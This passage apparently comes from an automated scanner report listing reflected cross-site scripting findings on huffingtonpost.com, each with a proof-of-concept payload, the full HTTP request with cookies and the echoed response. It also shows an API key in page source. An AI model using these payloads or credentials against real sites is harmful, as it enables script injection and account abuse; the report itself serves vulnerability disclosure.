Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/02/holocaust-memorial-day_n_856638.html?57a5e"-alert(1)-"d6ccc38ed4b=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.14.9.1304575182212; s_pers=%20s_getnr%3D1304575182214-New%7C1367647182214%3B%20s_nrgvo%3DNew%7C1367647182216%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Osama%25252520Bin%25252520Laden%25252520Pictures%25252520Will%25252520Not%25252520Be%25252520Released%2525252C%25252520Obama%25252520Decides%25252520%25252528UPDATED%25252529%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Thu, 05 May 2011 01:00:54 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 01:00:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 470003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
ent_vertical_name = 'world';
   HPConfig.current_vertical_id = 15;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/02/holocaust-memorial-day_n_856638.html?57a5e"-alert(1)-"d6ccc38ed4b=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

5.189. http://www.huffingtonpost.com/2011/05/04/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/04/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73665"-alert(1)-"b74fba3530f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/04/?73665"-alert(1)-"b74fba3530f=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 140702
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=287
Date: Thu, 05 May 2011 10:58:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
le_fb_widgets = 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/04/?73665"-alert(1)-"b74fba3530f=1";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display
...[SNIP]...

5.190. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/04/cnn-poll-finds-that-most-_n_857597.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 225fd"-alert(1)-"d892f95823f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/04/cnn-poll-finds-that-most-_n_857597.html?225fd"-alert(1)-"d892f95823f=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 256534
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:58:56 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
t_vertical_name = 'media';
   HPConfig.current_vertical_id = 4;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?225fd"-alert(1)-"d892f95823f=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

5.191. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/04/osama-bin-laden-pictures_n_857568.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0d5c"-alert(1)-"6cd81aa9f7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/04/osama-bin-laden-pictures_n_857568.html?c0d5c"-alert(1)-"6cd81aa9f7d=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.6.10.1304575105; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; s_pers=%20s_getnr%3D1304575170358-New%7C1367647170358%3B%20s_nrgvo%3DNew%7C1367647170363%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Breaking%25252520News%25252520and%25252520Opinion%25252520on%25252520The%25252520Huffington%25252520Post%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Thu, 05 May 2011 01:00:32 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 01:00:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 279986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
t_vertical_name = 'world';
   HPConfig.current_vertical_id = 15;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/04/osama-bin-laden-pictures_n_857568.html?c0d5c"-alert(1)-"6cd81aa9f7d=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

5.192. http://www.huffingtonpost.com/ads/check_flights.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /ads/check_flights.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e44cb<img%20src%3da%20onerror%3dalert(1)>247063d742 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e44cb<img src=a onerror=alert(1)>247063d742 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ads/check_flights.php?hash_arr=668c86f90cebbc608352294daf80abf4,6c43dadc0399d240a9123eabb15dcbde,a54ec74e448643da029271f5eae046b4&spot=right_rail_/e44cb<img%20src%3da%20onerror%3dalert(1)>247063d742flex HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; huffpost_adssale=y; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_getnr%3D1304575104613-New%7C1367647104613%3B%20s_nrgvo%3DNew%7C1367647104615%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 00:59:42 GMT
Connection: close
Content-Length: 86

{"result":false,"spot":"right_rail_\/e44cb<img src=a onerror=alert(1)>247063d742flex"}

5.193. http://www.huffingtonpost.com/ads/check_flights.php [spot parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /ads/check_flights.php

Issue detail

The value of the spot request parameter is copied into the HTML document as plain text between tags. The payload 4f9ed<img%20src%3da%20onerror%3dalert(1)>7efda56f1f4 was submitted in the spot parameter. This input was echoed as 4f9ed<img src=a onerror=alert(1)>7efda56f1f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ads/check_flights.php?hash_arr=668c86f90cebbc608352294daf80abf4,6c43dadc0399d240a9123eabb15dcbde,a54ec74e448643da029271f5eae046b4&spot=right_rail_flex4f9ed<img%20src%3da%20onerror%3dalert(1)>7efda56f1f4 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; huffpost_adssale=y; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_getnr%3D1304575104613-New%7C1367647104613%3B%20s_nrgvo%3DNew%7C1367647104615%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 00:59:40 GMT
Connection: close
Content-Length: 85

{"result":false,"spot":"right_rail_flex4f9ed<img src=a onerror=alert(1)>7efda56f1f4"}

5.194. http://www.huffingtonpost.com/advertise/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /advertise/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3503"-alert(1)-"679e429de31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/?c3503"-alert(1)-"679e429de31=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 96474
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=159
Date: Thu, 05 May 2011 10:58:37 GMT
Connection: close

<script>
ad_ears_on = true;

</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/19
...[SNIP]...
ble_fb_widgets = 1;
   HPConfig.current_vertical_name = 'homepage';
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/advertise/?c3503"-alert(1)-"679e429de31=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

5.195. http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 27f4c<script>alert(1)</script>ea4f1e5950b was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous&gn=window.Badges_217429195_1&eu=http%3A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html&id=857568&eco=1304530500&ebi2&entry_design=&cb=window.Badges_217429195_1.slicesCallback27f4c<script>alert(1)</script>ea4f1e5950b&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.11.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:00:43 GMT
Connection: close
Content-Length: 5901

window.Badges_217429195_1.slicesCallback27f4c<script>alert(1)</script>ea4f1e5950b({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous"],"global_name":"window.Badges_217429195_1","slice_params":{"facebook_glamorous":{"share_amount":"1550"},"
...[SNIP]...

5.196. http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the gn request parameter is copied into the HTML document as plain text between tags. The payload 7d045<img%20src%3da%20onerror%3dalert(1)>df834abc014 was submitted in the gn parameter. This input was echoed as 7d045<img src=a onerror=alert(1)>df834abc014 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous&gn=window.Badges_217429195_17d045<img%20src%3da%20onerror%3dalert(1)>df834abc014&eu=http%3A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html&id=857568&eco=1304530500&ebi2&entry_design=&cb=window.Badges_217429195_1.slicesCallback&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.11.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:00:42 GMT
Connection: close
Content-Length: 5904

window.Badges_217429195_1.slicesCallback({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous"],"global_name":"window.Badges_217429195_17d045<img src=a onerror=alert(1)>df834abc014","slice_params":{"facebook_glamorous":{"share_amount":"1550"},"retweet_glamorous":{"short_url":"http:\/\/huff.to\/mQyhPt","tweet_text":"Obama Decides Against Releasing Bin Laden Photos","views_amount"
...[SNIP]...

5.197. http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the sn request parameter is copied into the HTML document as plain text between tags. The payload 963b6<img%20src%3da%20onerror%3dalert(1)>f99a809b4c3 was submitted in the sn parameter. This input was echoed as 963b6<img src=a onerror=alert(1)>f99a809b4c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

